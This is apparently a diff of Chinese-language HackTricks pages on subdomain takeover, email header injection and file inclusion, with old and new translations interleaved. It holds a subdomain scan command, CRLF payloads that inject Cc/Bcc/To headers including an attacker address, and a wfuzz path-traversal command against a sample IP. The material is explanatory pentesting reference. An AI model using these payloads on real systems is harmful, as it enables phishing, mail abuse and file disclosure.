- [https://github.com/m4ll0k/takeover](https://github.com/m4ll0k/takeover)
- [https://github.com/antichown/subdomain-takeover](https://github.com/antichown/subdomain-takeover)
- [https://github.com/musana/mx-takeover](https://github.com/musana/mx-takeover)
- [https://github.com/PentestPad/subzy](https://github.com/PentestPad/subzy)
* [https://github.com/EdOverflow/can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz)
* [https://github.com/blacklanternsecurity/bbot](https://github.com/blacklanternsecurity/bbot)
* [https://github.com/punk-security/dnsReaper](https://github.com/punk-security/dnsReaper)
* [https://github.com/haccer/subjack](https://github.com/haccer/subjack)
* [https://github.com/anshumanbh/tko-sub](https://github.com/anshumanbh/tko-subs)
* [https://github.com/ArifulProtik/sub-domain-takeover](https://github.com/ArifulProtik/sub-domain-takeover)
* [https://github.com/SaadAhmedx/Subdomain-Takeover](https://github.com/SaadAhmedx/Subdomain-Takeover)
* [https://github.com/Ice3man543/SubOver](https://github.com/Ice3man543/SubOver)
* [https://github.com/m4ll0k/takeover](https://github.com/m4ll0k/takeover)
* [https://github.com/antichown/subdomain-takeover](https://github.com/antichown/subdomain-takeover)
* [https://github.com/musana/mx-takeover](https://github.com/musana/mx-takeover)
* [https://github.com/PentestPad/subzy](https://github.com/PentestPad/subzy)
#### 使用[BBOT](https://github.com/blacklanternsecurity/bbot)扫描可劫持的子域:
#### 使用 [BBOT](https://github.com/blacklanternsecurity/bbot) 扫描可劫持的子域
BBOT的默认子域枚举中包含子域接管检查。签名直接从[https://github.com/EdOverflow/can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz)获取
子域名接管检查包含在 BBOT 的默认子域名枚举中。签名直接来自 [https://github.com/EdOverflow/can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz)
```bash
bbot -t evilcorp.com -f subdomain-enum
```
### 通过 DNS 通配符生成子域接管
### 子域名接管生成通过DNS通配符
当在一个域中使用 DNS 通配符时,该域的任何请求的子域,如果没有明确指定不同的地址,将被**解析为相同的信息**。这可以是一个 A ip 地址,一个 CNAME...
当在一个域中使用DNS通配符时任何请求的该域的子域名如果没有明确的不同地址将会被**解析为相同的信息**。这可以是一个A IP地址一个CNAME...
例如,如果 `*.testing.com` 被通配为 `1.1.1.1`。那么,`not-existent.testing.com` 将指向 `1.1.1.1`
例如,如果`*.testing.com`被通配到`1.1.1.1`。那么,`not-existent.testing.com`将指向`1.1.1.1`
然而,如果管理员将其指向一个**第三方服务通过 CNAME**,比如一个**github 子域**,例如 (`sohomdatta1.github.io`)。攻击者可以**创建自己的第三方页面**(在这种情况下是 Github并表示 `something.testing.com` 指向那里。因为,**CNAME 通配符**将同意攻击者能够**为受害者的域生成任意子域指向他的页面**。
然而,如果系统管理员不是指向一个IP地址而是通过CNAME指向一个**第三方服务**,例如一个**github子域名**`sohomdatta1.github.io`)。攻击者可以**创建他自己的第三方页面**在这种情况下是Gihub并声称`something.testing.com`指向那里。因为,**CNAME通配符**将同意攻击者能够**为受害者的域生成任意子域指向他的页面**。
您可以在 CTF write-up 中找到这个漏洞的示例:[https://ctf.zeyu2001.com/2022/nitectf-2022/undocumented-js-api](https://ctf.zeyu2001.com/2022/nitectf-2022/undocumented-js-api)
您可以在CTF写作中找到此漏洞的示例:[https://ctf.zeyu2001.com/2022/nitectf-2022/undocumented-js-api](https://ctf.zeyu2001.com/2022/nitectf-2022/undocumented-js-api)
## 利用子域接管
## 利用子域接管
子域接管本质上是互联网上特定域的 DNS 欺骗,允许攻击者为一个域设置 A 记录,导致浏览器显示来自攻击者服务器的内容。这种浏览器中的**透明性**使域名容易受到钓鱼攻击。攻击者可以利用[_typosquatting_](https://en.wikipedia.org/wiki/Typosquatting)或[_Doppelganger domains_](https://en.wikipedia.org/wiki/Doppelg%C3%A4nger)来实现这一目的。特别容易受到影响的是在钓鱼邮件中 URL 看起来合法的域名,欺骗用户并通过域名固有的信任规避垃圾邮件过滤器。
子域名接管本质上是在互联网上针对特定域的DNS欺骗允许攻击者为一个域设置A记录使浏览器显示来自攻击者服务器的内容。这种浏览器中的**透明性**使域容易受到网络钓鱼攻击。攻击者可能会使用[_typosquatting_](https://en.wikipedia.org/wiki/Typosquatting)或[_Doppelganger domains_](https://en.wikipedia.org/wiki/Doppelg%C3%A4nger)来达到这个目的。特别容易受到攻击的是那些在网络钓鱼邮件中看起来合法的URL欺骗用户并由于域的固有信任而逃避垃圾邮件过滤器。
查看这篇[文章以获取更多详细信息](https://0xpatrik.com/subdomain-takeover/)
查看此[帖子以获取更多详细信息](https://0xpatrik.com/subdomain-takeover/)
### **SSL 证书**
### **SSL证书**
如果攻击者通过像[_Let's Encrypt_](https://letsencrypt.org/)这样的服务生成 SSL 证书,将增加这些假域的合法性,使钓鱼攻击更具说服力。
如果攻击者通过像[_Let's Encrypt_](https://letsencrypt.org/)这样的服务生成SSL证书将增加这些假域的合法性使网络钓鱼攻击更具说服力。
### **Cookie 安全和浏览器透明性**
### **Cookie安全和浏览器透明性**
浏览器透明性还延伸到 cookie 安全,受[同源策略](https://en.wikipedia.org/wiki/Same-origin\_policy)等政策的约束。Cookie 经常用于管理会话和存储登录令牌,可以通过子域接管来利用。攻击者可以通过将用户重定向到一个受损的子域来**收集会话 cookie**,危及用户数据和隐私。
浏览器透明性还扩展到cookie安全性由[同源策略](https://en.wikipedia.org/wiki/Same-origin_policy)等政策管理。Cookies通常用于管理会话和存储登录令牌可以通过子域名接管进行利用。攻击者可以**收集会话cookie**,只需将用户引导到一个被攻陷的子域,危及用户数据和隐私。
### **电子邮件和子域接管**
### **电子邮件和子域接管**
子域接管的另一个方面涉及电子邮件服务。攻击者可以操纵**MX 记录**以从合法子域接收或发送电子邮件,增强钓鱼攻击的效果
子域接管的另一个方面涉及电子邮件服务。攻击者可以操纵**MX记录**以接收或发送来自合法子域的电子邮件,从而增强网络钓鱼攻击的有效性
### **更高级别的风险**
### **更高的风险**
进一步的风险包括**NS 记录接管**。如果攻击者控制了一个域的一个 NS 记录,他们可能会将一部分流量定向到他们控制的服务器。如果攻击者为 DNS 记录设置了较高的**TTL生存时间**,则攻击的持续时间会延长,这种风险会加剧
进一步的风险包括**NS记录接管**。如果攻击者控制了一个域的NS记录他们可以潜在地将部分流量引导到他们控制的服务器。如果攻击者为DNS记录设置了高**TTL生存时间**,则这种风险会加大,延长攻击的持续时间
### CNAME 记录漏洞
### CNAME记录漏洞
攻击者可能会利用指向不再使用或已被废弃的外部服务的未声明的 CNAME 记录。这使他们可以在受信任的域下创建一个页面,进一步促进钓鱼或恶意软件分发。
攻击者可能会利用指向不再使用或已被停用的外部服务的未声明CNAME记录。这使他们能够在受信任的域下创建一个页面,进一步促进网络钓鱼或恶意软件分发。
### **缓解策略**
缓解策略包括:
1. **删除易受攻击的 DNS 记录** - 如果不再需要子域,这是有效的。
2. **声明域名** - 在相应的云提供商注册资源或重新购买过期域名。
3. **定期监控漏洞** - 像[aquatone](https://github.com/michenriksen/aquatone)这样的工具可以帮助识别易受攻击的域。组织还应审查其基础设施管理流程,确保 DNS 记录创建是资源创建的最后一步,也是资源销毁的第一步。
1. **删除易受攻击的DNS记录** - 如果不再需要子域,这种方法是有效的。
2. **声明域名** - 在相应的云提供商注册资源或重新购买过期域名。
3. **定期监控漏洞** - 像[aquatone](https://github.com/michenriksen/aquatone)这样的工具可以帮助识别易受攻击的域。组织还应修订其基础设施管理流程确保DNS记录的创建是资源创建的最后一步资源销毁的第一步。
对于云提供商,验证域名所有权对于防止子域接管至关重要。一些提供商,如[GitLab](https://about.gitlab.com/2018/02/05/gitlab-pages-custom-domain-validation/),已经意识到了这个问题,并实施了域名验证机制。
对于云提供商,验证域名所有权对于防止子域接管至关重要。一些提供商,如[GitLab](https://about.gitlab.com/2018/02/05/gitlab-pages-custom-domain-validation/),已经认识到这个问题并实施了域验证机制。
## 参考资料
## 参考文献
* [https://0xpatrik.com/subdomain-takeover/](https://0xpatrik.com/subdomain-takeover/)
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=domain-subdomain-takeover) 可以轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
立即获取访问权限:
使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=domain-subdomain-takeover)轻松构建和**自动化工作流**,由世界上**最先进**的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=domain-subdomain-takeover" %}
{% hint style="success" %}
学习和实践AWS黑客攻击<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家ARTE**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客攻击<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家GRTE**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord小组**](https://discord.gg/hRep4RUj7f)或[**电报小组**](https://t.me/peass)或**关注**我们在**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github库提交PR分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,46 +1,51 @@
# 电子邮件注入
# Email Injections
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections)可以轻松构建和**自动化工作流程**,并使用全球**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
今天获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)系列
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
## 在发送的电子邮件中注入
## 注入已发送的电子邮件
### 在发件人参数后注入抄送和密送
### 在发件人参数后注入 Cc 和 Bcc
```
From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com
```
消息将发送到收件人和收件人1帐户。
消息将被发送到收件人和收件人1账户。
### 注入参数
```
From:sender@domain.com%0ATo:attacker@domain.com
```
消息将发送到原始收件人和攻击者账户。
### 注入主题参数
```
From:sender@domain.com%0ASubject:This is%20Fake%20Subject
```
假主题将被添加到原始主题中,在某些情况下将替换它。这取决于邮件服务的行为。
### 更改消息正文
注入两行换行符,然后写您的消息以更改消息的正文。
注入一个两行换行符,然后写您的消息以更改消息的正文。
```
From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.
```
@ -60,37 +65,37 @@ Parameter #4 [ <optional> $additional_parameters ]
}
}
```
#### 第5个参数$additional\_parameters
#### 第五个参数 ($additional\_parameters)
这一部分将基于**假设攻击者控制该参数时如何滥用**。
本节将基于**假设攻击者控制此参数的情况下如何滥用此参数**。
此参数将被添加到PHP用于调用二进制sendmail的命令行中。但是它将通过函数`escapeshellcmd($additional_parameters)`进行消毒
此参数将被添加到 PHP 用于调用二进制 sendmail 的命令行中。然而,它将通过函数 `escapeshellcmd($additional_parameters)` 进行清理
在这种情况下,攻击者可以**注入提取sendmail的参数**。
在这种情况下,攻击者可以**注入 sendmail 的提取参数**。
#### /usr/sbin/sendmail实现的差异
#### /usr/sbin/sendmail 实现的差异
**sendmail**接口由系统上安装的MTA邮件软件Sendmail、Postfix、Exim等提供。尽管出于兼容性原因**基本功能**(如-t -i -f参数保持**相同**,但**其他功能和参数**根据安装的MTA而有很大不同
**sendmail** 接口安装在系统上的 **MTA 邮件软件**Sendmail、Postfix、Exim 等)提供。尽管出于兼容性原因,**基本功能**(如 -t -i -f 参数)保持**相同**,但**其他功能和参数**根据安装的 MTA 有很大差异
以下是sendmail命令/接口不同手册页的几个示例:
以下是 sendmail 命令/接口的不同手册页的一些示例:
- Sendmail MTA: [http://www.sendmail.org/\~ca/email/man/sendmail.html](http://www.sendmail.org/\~ca/email/man/sendmail.html)
- Postfix MTA: [http://www.postfix.org/mailq.1.html](http://www.postfix.org/mailq.1.html)
- Exim MTA: [https://linux.die.net/man/8/eximReferences](https://linux.die.net/man/8/eximReferences)
* Sendmail MTA: http://www.sendmail.org/\~ca/email/man/sendmail.html
* Postfix MTA: http://www.postfix.org/mailq.1.html
* Exim MTA: https://linux.die.net/man/8/eximReferences
根据sendmail二进制文件的**来源**,已发现不同的选项可用于滥用它们并**泄漏文件甚至执行任意命令**。查看详情:[**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
根据 **sendmail** 二进制文件的来源,发现了不同的选项来滥用它们并**泄露文件或甚至执行任意命令**。请查看 [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
## 在电子邮件名称中注入
### 电子邮件中被忽略的部分
### 被忽略的电子邮件部分
符号:**+-** 和 **{}** 在极少数情况下可用于标记,并被大多数电子邮件服务器忽略
符号:**+、-** 和 **{}** 在少数情况下可以用于标记,并被大多数电子邮件服务器忽略
- 例如 john.doe+intigriti@example.com → john.doe@example.com
* 例如:john.doe+intigriti@example.com → john.doe@example.com
括号中的注释()**在开头或结尾也将被忽略**
**括号 () 中的注释**在开头或结尾也会被忽略。
- 例如 john.doe(intigriti)@example.com → john.doe@example.com
* 例如:john.doe(intigriti)@example.com → john.doe@example.com
### 白名单绕过
@ -100,69 +105,70 @@ Parameter #4 [ <optional> $additional_parameters ]
<figure><img src="../.gitbook/assets/image (626).png" alt="https://www.youtube.com/watch?app=desktop&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
### IP地址
### IP
您还可以在方括号之间使用IP地址作为域名:
您还可以使用方括号中的 IP 作为域名:
- john.doe@\[127.0.0.1]
- john.doe@\[IPv6:2001:db8::1]
* john.doe@\[127.0.0.1]
* john.doe@\[IPv6:2001:db8::1]
### 其他漏洞
![https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](<../.gitbook/assets/image (1131).png>)
## 第三方SSO
## 第三方 SSO
### XSS
一些服务如**github**或**salesforce允许**您在**电子邮件地址中创建XSS负载**。如果您可以**使用这些提供商登录其他服务**,而这些服务**未正确消毒**电子邮件,您可能会引发**XSS**
一些服务如 **github****salesforce 允许**您创建带有 **XSS 负载的电子邮件地址**。如果您可以**使用这些提供商登录其他服务**,而这些服务**没有正确清理**电子邮件,您可能会导致 **XSS**
### 账户接管
如果**SSO服务**允许您**创建帐户而无需验证给定的电子邮件地址**(如**salesforce**),然后您可以使用该帐户登录**信任**salesforce的不同服务您可以访问任何帐户。\
请注意salesforce指示给定的电子邮件是否已验证因此应用程序应考虑此信息。
如果 **SSO 服务** 允许您 **创建一个不验证给定电子邮件地址的账户**(如 **salesforce**),然后您可以使用该账户在 **信任** salesforce 的不同服务中 **登录**,您可能会访问任何账户。\
_请注意salesforce 指示给定的电子邮件是否经过验证但应用程序也应考虑此信息。_
## 回复地址
## 回复
您可以发送一封电子邮件使用_**发件人company.com**_和_**回复地址attacker.com**_如果由于电子邮件是从**内部地址**发送的而发送了**自动回复**,则**攻击者**可能能够**接收**该**响应**
您可以使用 _**From: company.com**__**Replay-To: attacker.com**_ 发送电子邮件,如果由于电子邮件是从 **内部地址** 发送的而发送了任何 **自动回复**,则 **攻击者** 可能能够 **接收**该 **响应**
## 硬退信率
某些服务,如AWS实施了一个称为**硬退信率**的阈值通常设置为10%。这是一个关键指标特别是对于电子邮件传递服务。当超过此比率时例如AWS的电子邮件服务可能会被暂停或阻止。
某些服务,如 AWS实施一个称为 **硬退信率** 的阈值,通常设置为 10%。这是一个关键指标,尤其对于电子邮件投递服务。当此比率超过时,服务(如 AWS 的电子邮件服务)可能会被暂停或阻止。
**硬退信**指的是因为收件人地址无效或不存在而被退回给发件人的电子邮件。这可能是由于各种原因,例如将电子邮件发送到不存在的地址,不存在的域或收件人服务器拒绝接受**电子邮件**
**硬退信** 是指由于收件人地址无效或不存在而被退回给发件人的 **电子邮件**。这可能由于多种原因发生,例如 **电子邮件** 发送到不存在的地址、一个不真实的域名,或收件人服务器拒绝接受 **电子邮件**
AWS的情况下如果您发送了1000封电子邮件其中有100封由于原因如地址或域无效而导致硬退信这意味着10%的硬退信率。达到或超过此比率可能会触发AWS SES简单电子邮件服务阻止或暂停您的电子邮件发送能。
AWS 的上下文中,如果您发送 1000 封电子邮件,其中 100 封导致硬退信(由于无效地址或域名等原因),这将意味着 10% 的硬退信率。达到或超过此比率可能会触发 AWS SES简单电子邮件服务阻止或暂停您的电子邮件发送能
保持低硬退信率对于确保不间断的电子邮件服务和维护发件人声誉至关重要。监控和管理邮件列表中电子邮件地址的质量可以极大地帮助实现这一目标。
保持低硬退信率对于确保不间断的电子邮件服务和维护发件人声誉至关重要。监控和管理您的邮件列表中电子邮件地址的质量可以显著帮助实现这一目标。
有关更详细的信息可以参考AWS关于处理退信和投诉的官方文档[AWS SES退信处理](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#bounce-types)。
有关更详细的信息,可以参考 AWS 关于处理退信和投诉的官方文档 [AWS SES 退信处理](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#bounce-types)。
## 参考资料
## 参考文献
- [https://resources.infosecinstitute.com/email-injection/](https://resources.infosecinstitute.com/email-injection/)
- [https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
- [https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view)
- [https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0)
* [https://resources.infosecinstitute.com/email-injection/](https://resources.infosecinstitute.com/email-injection/)
* [https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
* [https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view)
* [https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版本的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections)可以轻松构建和**自动化工作流程**,使用全球**最先进**的社区工具。\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}

View file

@ -1,78 +1,79 @@
# 文件包含/路径遍历
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs收藏品](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客的刺激挑战的内容
参与深入探讨黑客的刺激挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
随时了解最新的赏金计划发布和重要平台更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),立即与顶尖黑客合作!
**加入我们在** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作!
## 文件包含
**远程文件包含RFI** 从远程服务器加载文件最佳您可以编写代码服务器将执行它。在php中默认情况下**禁用**此功能(**allow\_url\_include**。\
**本地文件包含LFI** 服务器加载本地文件。
**远程文件包含 (RFI)** 文件从远程服务器加载(最佳:您可以编写代码,服务器将执行它)。在 php 中,这默认是 **禁用** 的 (**allow\_url\_include**)。\
**本地文件包含 (LFI)** 服务器加载本地文件。
当用户以某种方式控制服务器将要加载的文件时,就会出现漏洞。
当用户以某种方式控制将被服务器加载的文件时,就会发生漏洞。
**PHP函数**中的漏洞require、require\_once、include、include\_once
易受攻击的 **PHP 函数**require, require\_once, include, include\_once
一个用于利用此漏洞的有趣工具:[https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
一个有趣工具来利用这个漏洞[https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
## 盲目 - 有趣 - LFI2RCE文件
## Blind - Interesting - LFI2RCE 文件
```python
wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ
```
### **Linux**
**混合了几个 \*nix LFI 列表并添加了更多路径,我创建了这个列表:**
**混合多个 \*nix LFI 列表并添加更多路径,我创建了这个:**
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt" %}
尝试将 `/` 改为 `\`\
还可以尝试添加 `../../../../../`
尝试将 `/` 改为 `\`\
尝试添加 `../../../../../`
可以在[这里](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)找到一个使用多种技术来查找文件 /etc/password以检查漏洞是否存在的列表
一个使用多种技术查找文件 /etc/password以检查漏洞是否存在的列表可以在 [这里](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt) 找到。
### **Windows**
合并了不同的单词列表:
不同词表的合并:
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt" %}
尝试将 `/` 改为 `\`\
还可以尝试删除 `C:/` 并添加 `../../../../../`
尝试将 `/` 改为 `\`\
